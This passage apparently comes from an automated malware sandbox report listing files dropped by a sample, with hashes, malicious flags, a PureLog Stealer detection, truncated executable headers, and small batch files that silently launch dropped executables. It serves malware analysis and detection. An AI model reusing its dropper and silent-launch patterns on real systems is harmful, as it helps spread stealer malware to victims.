Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A\|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e..............................J...........@.......................... J...........@.................................Vp..j....`........................J.............................x.J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... . .........................@...icxmwjzd.p....0..l..................@...luxgzuin......J......X..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\bUWKfj04aU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975613351986162
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94x:/AOR4kNz52Y2mz+DmQxP/MYFx90
MD5:	BABAF4A8115EFF2FF0233CBB89D043CC
SHA1:	5DAA1002763E87D09719587E04A3C6A093E95CC6
SHA-256:	5F5FD255D8F6C9172DB3309AE1AAA22C41063A294BB06F178DF74DA6D722C662
SHA-512:	CEC3A6D4912E2A1AA2E93188CDCA5A2B223FFB13D0836C4D6524826604FCED9D82D99E4FFFEAF47443CA78C8004806974844CB9FF5568B8484AE9A6D9C270ABD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236342705950542
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nl:uIDymkE/MdGGnwsDEgGM8o1zwN9l
MD5:	49D2FD7E0A591B6AE99D11E5EDAAECF2
SHA1:	07CAEE60EFC43B45D18B027A81B694955959F838
SHA-256:	20B96F74D18A0D8D8DC5CE8C58F18DB43868E5DC76A2C87F578179968D9C4F74
SHA-512:	9CF59A3035C4A093E87BB74ABF0F01845CDE7D21E4714FE48F31432AA91F7F374C33F509F98F26CFE7A6B61596D76EB3E591210EAA760FD692156A70E16DF96B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2665984
Entropy (8bit):	6.546705490640015
Encrypted:	false
SSDEEP:	49152:UjBP3/qGrdNJ8VZFhY++Yk/4aLq8wH7mm6qJsSRRjyl:aBPvfrAZF28k/RLbwH7mvcRRjy
MD5:	FFADA57F998ED6A72B6BA2F072D2690A
SHA1:	6857B5F0C40A1CDB0411EB34AA9FE5029BCDB84F
SHA-256:	677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
SHA-512:	1DE77F83A89935BB3FC3772D5190C3827D76A998785D451E2C0D11A0061CFD28F1B96ECCB41B012C76DDDA2021E3333A0A647489AE3C6DAC10CFB8302ABDF33F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........(.....@..........@.............................0)...........`.....................................................<.....).......(.............. ).x...............................(.......8...........@...X............................text...V........................... ..`.rdata...".......$..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc.........).......(.............@..@.reloc..x.... ).......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	392888
Entropy (8bit):	7.960217382643453
Encrypted:	false
SSDEEP:	6144:kz00wubhcFv7g9X7wkDStegoIG2sJnuhLvdHVpHBm/F0kpJVdVpftj7XfLT:kzhBqFv7g9kBVG2ACLvd1pBmN3pJ5plX
MD5:	81F2E982687C695EE0BBADF147FECA3B
SHA1:	B33A15B47C3B99C65F2277562A928BF9CE9DABF7
SHA-256:	B1BF0F6717341CB605EBF48E85805282B77E5A3D610F211B90E4EC726B448331
SHA-512:	16461398006E12C7ACC47AE87859BC4567405A7FDCA2E3D13863CF14B424036C1703D882F30A3E4AA62A2CEC9D8C994B6FA823BA8250EC0E6BA35F52AE2ECF05
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....G.f.........."...0..V............... ....@...... ....................................`.........................................................................................tu............................................................... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@........................................H........2...B......+...................................................H.........(....:.(......}....>...{.... ...._2.\|....(....6.\|.....(....&...(....... ...._T.. ...._..cT... ...._...R.~............~............~..............(....(......(....(......(....(...."..(....*...( ...&..{....,.ro..p......%.r...p.(....s>...zB.....("........v..{....o?...2...{.....o@...V(4....!s.....!o....&..(......(....6(2...&(3...&..(.......0.............{...... ...._. ...._..cY.0..

C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1793536
Entropy (8bit):	7.937675203377117
Encrypted:	false
SSDEEP:	49152:L/eYUVc8uWw3Sg6s8Zep6UXIEgf7WD4GTF:L/eYUW8bwUaPXVgzWMG
MD5:	85A15F080B09ACACE350AB30460C8996
SHA1:	3FC515E60E4CFA5B3321F04A96C7FB463E4B9D02
SHA-256:	3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B
SHA-512:	ADE5E3531DFA1A01E6C2A69DEB2962CBF619E766DA3D6E8E3453F70FF55CCBCBE21381C7B97A53D67E1CA88975F4409B1A42A759E18F806171D29E4C3F250E9F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................T..........Nr... ........@.. ....................................`..................................r..K.......D............................q............................................... ............... ..H............text...TR... ...T.................. ..`.rsrc...D............V..............@..@.reloc...............\..............@..B................0r......H........w..x...........$....&...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z...(......0..$.........r...p......~....(....~....(.........]....0................s.........}.......i..... .......... ...............&........}....8......{.......d.....~....(................{....~....(....s.........o.......o.......o.......o.......o............{....o........:............s

C:\Users\user\AppData\Local\Temp\1001053001\gold.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	315904
Entropy (8bit):	7.989648551677086
Encrypted:	false
SSDEEP:	6144:YsFFiBD/2f50sJknDeebx5pAsqL3N8MYk7ZA9k+AEGYeBTNEV:0ghHunDeebx5U2MYkZDEGYeBTiV
MD5:	818B475B766C54DF6D845CB10B6EEDCF
SHA1:	69BA418B84F5EB0930BA483C8FB1D8416B0B8749
SHA-256:	8CECA5E241D721A22AA11FA5FC0700C394C9C809FC2565458DEDF5C45E99C478
SHA-512:	93371ECE9326B2E88425C01D4F6F7DCC19AE5EE252295D8DDF283BC21AE4F5A72761B0F3AE1204DC85FCD1A11096CCD6C3AF4B9E6A85AD9833E8CB06B85C5CA4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^..........."...0.............b2... ........@.. .......................@............`..................................2..O............................ .......1..8............................................ ............... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................A2......H........$.................................................................]....0..#.........i. .......... .............+B.....- ....d....(....(...............+.......(...........o......X.. ....2.....+7. ....... ..............XX.. ....]...................X.. ....2........+f...+T..X ....].....X ....]...........&...................X ....]..........%G....a.R...X......i2....X.....2....................(....n .........%.....(..........0..H.........89.....P......%G ....X.R.P....

C:\Users\user\AppData\Local\Temp\1001059001\0lQs2u2bQN8wOmVXVy2wItPr.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.971582293977117
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5BiZpmdAB7pbkm:fE1N723IPkm
MD5:	24E5181266D6C149E6761DBD8CE669A3
SHA1:	6E99880F777B0DBACEC4563108E1161902631552
SHA-256:	442B62AB7BD50C7E059347D540538B34EE532C58D9E3C8B3ECF8BCA39F46651D
SHA-512:	EFFEDFC4CED6F43ED64500356764D858D708DF028701FB608F01FA2C5C4745D6CF22F47375A52A9485941B55618D67186E6069F6B9EA3E269F958782BB992335
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\dG8PuyJTCxed1f6M5xR2MLtX.exe"

C:\Users\user\AppData\Local\Temp\1001059001\0tYrOK0l3oFbXddjsmtb931W.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.9319329471399875
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5T8TScu413RmEF:fE1N723jgMEF
MD5:	A51F11EC4E3414152B00505C95C1BC10
SHA1:	B2EB94D0DE2FFAFAE81282672684D845F8937386
SHA-256:	83E39170BB5F598E70053530B0E1ACD48D632534D23A28B9DA7B1872FF0F4065
SHA-512:	4472CF11B7E21CC399352B05B71C03E59219595845C055358ECD1A3192EA4C3173F73388EE6EBA94C1F88B10E92B7F5D252E3691E508136CC8FC58EC5D6F9138
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe"

C:\Users\user\AppData\Local\Temp\1001059001\18oG7LNEo6QcClXRVAJbS4hd.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.943804516199339
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5nB32IqR/VTNHFn:fE1N723B3iTNl
MD5:	E23F858572E483E2229041872AC3E4DC
SHA1:	E1E0A40879DF07F595795262CCB0E32DD46CF566
SHA-256:	E80AD7E4D69BCCFC4A19AB5F4B9D69556905719CF04CFD305EC946CFA6FCE2AC
SHA-512:	9806B8B3A7EE77193F625589A36A1B34720C27C8CD638F44BCCF0512D9CD57153AFD79EA77121E4C155C0AD5D47BE8B11FC37FDDFC608699DA61BAC1FA780B27
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe"

C:\Users\user\AppData\Local\Temp\1001059001\3M4Jtk9KWHgh8ducxhTFcjW1.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.886541279304698
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J503K0sTunMZiVd9LACl:fE1N72303UToMZiVd9LNl
MD5:	15C0E1FD8445FBE643B155A41CD945B5
SHA1:	5D383E5B466BB23EF4ABC2AFB42A63F67BF9FE28
SHA-256:	FC7702CE9B5C3459E7B348317A68A09C5F51B1F0DB80937C61B3AC826EAFB57E
SHA-512:	1596F4440EB78BCC94594527E3F035DF90D5EA1BDDC331F09C3AB14AF641A259C173ED6DD9629EFD945092F4899F297575BB7795A15D34A1DFCAF84C799471C8
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\QgQgG9QxK6KBBiRO6TDiG08X.exe"

C:\Users\user\AppData\Local\Temp\1001059001\3mHg0ktrbc2PpU4ds9bpMhZZ.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.88340846695494
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5Ku3BIBvbLF:fE1N723KiIBvbx
MD5:	862DE7F9399B5A282BD067B36350CD2C
SHA1:	1B4FA830BFBA0F4E34E67149183CE04D064BD620
SHA-256:	96400DB31BA38AE73B33F6409DAB6D94F79B5593584FBF3692DD43685FB35D47
SHA-512:	4AC019533035B441C7525DF43C5FB451784DF174A9E0C19CF2739520BB67CD6A3ACB4B0A29CA272D7ACEDE95458F5D441543AE5B539920AE1FBF6D15F6C4FB91
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\oLeePKVd7zLdWzK9yLk3y6uB.exe"

C:\Users\user\AppData\Local\Temp\1001059001\4hs64zd1vggd1u64GpeGCzqk.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.813692494612525
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5U8TdW2yKwrw0EFn:fE1N723U8TdWQwrw0s
MD5:	0A18D0857834ADCF2B29E430B264A318
SHA1:	159D3DB9FE40AEE461EF34DF411553E814EA8CA2
SHA-256:	CD629BCBE52198ADA0E6C1B154DCBBA0A23F38517F376E04D33B8B1AA30B9FD5
SHA-512:	DD1F13B8B461A61D6A2C12233ECD52B0F154875DAB5451F4EF7B9949B3C0EE43B7AF0DD7C0422B10544EB18E3F07B1A239C5E30037749C6C11DFBABAD07C8F37
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe"

C:\Users\user\AppData\Local\Temp\1001059001\7INGj891a3Tm3DBdzkBBBu4f.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.787622398173832
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J59vsVaVwZNln:fE1N723NDwZv
MD5:	6248E19C39F281B2C521F320E839192B
SHA1:	F82EEAEAC9D20E1138053D7C1CD8E23D5D26AF19
SHA-256:	089333F22B2013BAAD4FD56F795526A7F849427A4F5C5AC2D7C0580D91177681
SHA-512:	4EC97BC7819B7F0077B0D5300EEA6F39FE33F65EF72CB470C71942A4F05320AAD08EAD03ABDB8B54AC6C1AEE368D147CE6F05F9628AB4374A93B841B07EE8A45
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\XJI9AFzBIfKNprDgZXpUs99e.exe"

C:\Users\user\AppData\Local\Temp\1001059001\7Px23zDNZXL8Wy0lPHfMYVTL.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.969874612638032
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5TWB1yrUywhEdm:fE1N723MyrNwh7
MD5:	BD82968F64C780923BEACA650CBE6014
SHA1:	CAD87A22E5FB4CB40D8A724E75C52A25F4568E9D
SHA-256:	96E3D7D79B9CCB7236EB0F3DC358689626AB39565343775B65BE25F950C85454
SHA-512:	944418AEA2B7CE9CF28DFE1494C12CDBA43E685CB3F2F4F4C5B1388125F9924CA688A9C90E5B6F201B656CB60848840754066D60C19F5EDF59BC99FD60B2A1B5
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\vSXx0NPQvyjoNMnvb7CbbdI3.exe"

C:\Users\user\AppData\Local\Temp\1001059001\7czkMh8EvSiPUijWCDYmOA0H.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.9248036057236355
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J52NRPBfc19iFn:fE1N7232NmiF
MD5:	D06C6E9FAA58B8323DAD938954C6D8BE
SHA1:	ED0EFFF38336E61DB62B477865396F22EBE20C63
SHA-256:	16583F245A3EBD3D747104B04ADFD759D3570F58F5480088622DB0455CACB272
SHA-512:	4C0B82AEF04DD31E49C617EEEF2D439ED7661C9125E2FE8EAD3A9772B3AF690BD1E7DEC8618A88ACB0457F0A4C42E3437EB31A94863B2CE132A82831B1C78A51
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\SSO4jRyuUDShfiudMUcxy9PM.exe"

C:\Users\user\AppData\Local\Temp\1001059001\83h7vd7bLREHOEODb4HLTiUR.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.735780821356457
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5wpffL7YVNF:fE1N723wh74X
MD5:	90FD67417C204580CB750573A60EA9D4
SHA1:	AC343AF87428EFF0FBDF86638563DE9FFCD889CC
SHA-256:	E8FF4AC51F32C2C8081ABC00D590F98487327EDB22FA957C3F8E17999F747BC0
SHA-512:	C245D0AD36B3E0F86CB4E7740273364893486F3ABB5C6875E20214760A9455BCC7F5A2338D48C8D8939010E3F782936BCDD15D02508C5D02205FB31CA66E1C9D
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\ULpJp44l4YgbS9xGxpGd4gFD.exe"

C:\Users\user\AppData\Local\Temp\1001059001\97Lqi3WoncD5y5D9KjmTRajv.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.800433905134981
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J52RP9Ls/1IGhLAEF:fE1N7232pps/dh0s
MD5:	8415C89B52087193A392EADCA0A0E43D
SHA1:	C8A3C5CBD858204B68E23FAB6ED9B503F7DCF143
SHA-256:	8E7638B0696B807B639C01643FC8BB8E669D1149E1833588EF7A9195BFBAE912
SHA-512:	111EA507B849AAEBABBC1BA5769918728994F26D48B2BB539EA3E0B54415936D8C20B189D6027EBAB2AB83C8359588E1F251993CD5619C8B73F87F2FB9BD11FF
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\Stj0rnzdLizcr79amRyA4wnp.exe"

C:\Users\user\AppData\Local\Temp\1001059001\9Y7uMe8QnC7FFfGfNRzEDhaF.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.895638807527665
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5uE3XIQRkNNln:fE1N723uE3XIQCN
MD5:	0674CE5D297F3C668C3D11EB3D49C41C
SHA1:	59C8A52A43E1C1F7B35B4F457C309463B7C05008
SHA-256:	48DE9FD98AE59C9A73D57E2AAC545502CBE436E542C78C5FD27EE79412E7B61A
SHA-512:	380E4F3D7EA6B19E6ABFD2D8EA5A90A6DB1EE842CF08E9188069D71D8DEF7604D189E104760D61BEB8FE4CC846382E0D182BDCAC3CCBC22224BA284A2CB24D29
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe"

C:\Users\user\AppData\Local\Temp\1001059001\9vtbOcSuXHIUE3aqSLzyIs15.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.886503511495897
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5JcAFmbLQ/gXDpRgJSkdan:fE1N723zFmvFXsJSD
MD5:	E53DCEBAADE71642EF2A18D119758675
SHA1:	AF6395D02B5EE272AD8A925E087727AC89BBD1A3
SHA-256:	B979A8B80A94A591792123DA635CA25F1D1C02520F7CCEEC62931E0B46CD85A3
SHA-512:	9885AF4DE7CD7749BDBE28CF0465832EABED0B01B9E81A573861D1FA39B1F3A599E163F3EF0481F2C08EBD6C54E6CA7447D062F2D377E79BDB0C8C3AF87C4E33
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\l9eBjdHLCrnnkZZKJdDffPtE.exe" --silent --allusers=0

C:\Users\user\AppData\Local\Temp\1001059001\DXBbZJH6aLRZHAVt4F6j0AmN.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.9352881543647955
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5RtXI1OiUpdQ3u:fE1N723LXI1/oH
MD5:	E70CF5E6239EFC4F86022E18BC5833A1
SHA1:	7A831D912DF08FBC4EA73D3935ED33EB805DF6E0
SHA-256:	8D58D73A805852993E78D7F7AEA7683B12B06B29B7B14EBD4D9D14F27AB99F69
SHA-512:	8FE6423686778C38C5C46B0AED062239D62394EA62FF949590A9133140C8384737AE2E91FDB2E384DB34ED6F084ADE831C193559A7865621F04F3D591A63EE1C
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\tH2mUUONokvK3vL8ubpXbilZ.exe"

C:\Users\user\AppData\Local\Temp\1001059001\Da4hPfXHBBjDyahp38gylcgg.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.876377391584433
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5fu/0UExX/3m:fE1N723D79/W
MD5:	6EA7D8197144710BC252D2FCBF81A61A
SHA1:	EE9150831A1CF11894AA81F8CA62D6AFE6C0E3F3
SHA-256:	55C7184FF203F543F176C3512511ABA884AEA32DD3978629700F576314BBB1FE
SHA-512:	C25BA3D5A45A99DE7FAC15F11A30CB76590CA1B7710FA4E99F87BEF3A7C2CE20E3BA6B6E92F4023AFBCEA78F05346BF745A176F630C8BB77E54B3E2826C701B8
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\zFwKnsnVeTcdv2qgWZnCYFfo.exe"

C:\Users\user\AppData\Local\Temp\1001059001\E2yH5MLGXjpJh1srJDZoMcAl.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.930225265800903
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5o2uD08mhIiQZNHF:fE1N723o2BH4B
MD5:	FB3EABBDC595454BBF7B8D29AC9E610E
SHA1:	367EA004CF1EA8D5937305B4C85E030D7EE9A37C
SHA-256:	6CA2DC775C640714F4EB68F3946629B629CE95D6ADD032659AEE37326E38DADD
SHA-512:	A61C3A0072531C7AED0A8524DB4EE47CF12BAD3E75259BBAB74C18109A8F4F15F40CE8CDB525D0AD8D70AB03175AEB0CA5B83A7E9015AE1B9580B0F8D046E368
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe"

C:\Users\user\AppData\Local\Temp\1001059001\EAIEYPMHLI2C96DGaxuSW1Wl.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.998994366163117
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5VXL4BcpdmIkdan:fE1N7239LMAd/D
MD5:	100384F5A111B14D9C9F201FF385B7F4
SHA1:	78F599677D181E199D0D12B9FDB8DE2C8E18FE1A
SHA-256:	21D41CE4656544D265CB70C64C75E43DB5F305D4B1AB3ADBA304827B8F14A6B3
SHA-512:	F56F7889AD754B3A2233B941DE98E64A224CA1BF653DE8F9D872B7742B9E82C444A0D5ADA37AC46C0417604D11EF3971D8741BEA44D48C4067D83DF9D9B8AAD4
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\p2n3E86Xy4ldROofshdOCL5V.exe" --silent --allusers=0

C:\Users\user\AppData\Local\Temp\1001059001\Elh8h4Mgm3Kyj26kaoBm2vi2.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.7462653699976185
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5Sl+y0nGU07:fE1N723SlNt
MD5:	C61E2AE626C9162150275F297E00A7CD
SHA1:	75F36C62A44D555525174F66902BB76CDBAA74F4
SHA-256:	1913EF57C35E1B6EBB88362BDFB3FCDD6481A725862ACB5BEE8F9F5AC6CDB0C2
SHA-512:	501F079C229DB7502E677569EF2920EA22544E2ECBCC1D4969B43EAAD46483415700F5243AD547C1192FE1C907E0B77D2BE639FF37EE2F571B760C06AAF68A73
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\wQWWfYa2Wpi02lLWRtocQHQR.exe"

C:\Users\user\AppData\Local\Temp\1001059001\EuHH093mR5qKLZmV0JaXHXHY.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.911545016246091
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5W900gHXs3JFn:fE1N723WW0YCL
MD5:	3DB0F34523B6606D060C1C364AFC8D80
SHA1:	A36FD57949DD0A5B246A49CE8060EE5211E62601
SHA-256:	07FFEF1D919ECF19F443588606061051022CFC0C5EEBFC138830A6F63D541453
SHA-512:	67E294AB83CAE18FC3A66FF385E8CF649D1A9D8B1E471E10DDA6043456E650AF8556B7ED4A4F0591E7152557C6149413416D4A2C8631E945457C2F7BF0691046
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\s72QQ1HEDtqfs0ltMB4uulZT.exe"

C:\Users\user\AppData\Local\Temp\1001059001\F3BI9GaNOs6Ya1J9lebEzYL9.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	5.045012245057714
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5fURPyuOURkn0s:fE1N7238R2IY
MD5:	74DFF77B2BA477A385E7CE84E8C763F0
SHA1:	A8936A3B8943F213ACA1AA98D76D3747B4487A88
SHA-256:	2ED7000CCC099760EBFC8363325F70956E3E1F318B35B3562EBA8F9FA1B14EFA
SHA-512:	369F0DFCDCF96B07A31D2CD9F1DD784F35078FB1A9FF4B4934E29268236266D73181490485551FFC002964FF9801721D6D26974CC1DE4F0914DC857C72047A85
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\zTSMwf6EqjBUbab8YHX1tAIc.exe"

C:\Users\user\AppData\Local\Temp\1001059001\FYWrmh9kVvfjND8uGAmX5Y4l.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.957086940709016
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5AQfHvcrDFTHJlIkdan:fE1N723A6crrSD
MD5:	4497FF1DCE00FD67F3989E98061D89BB
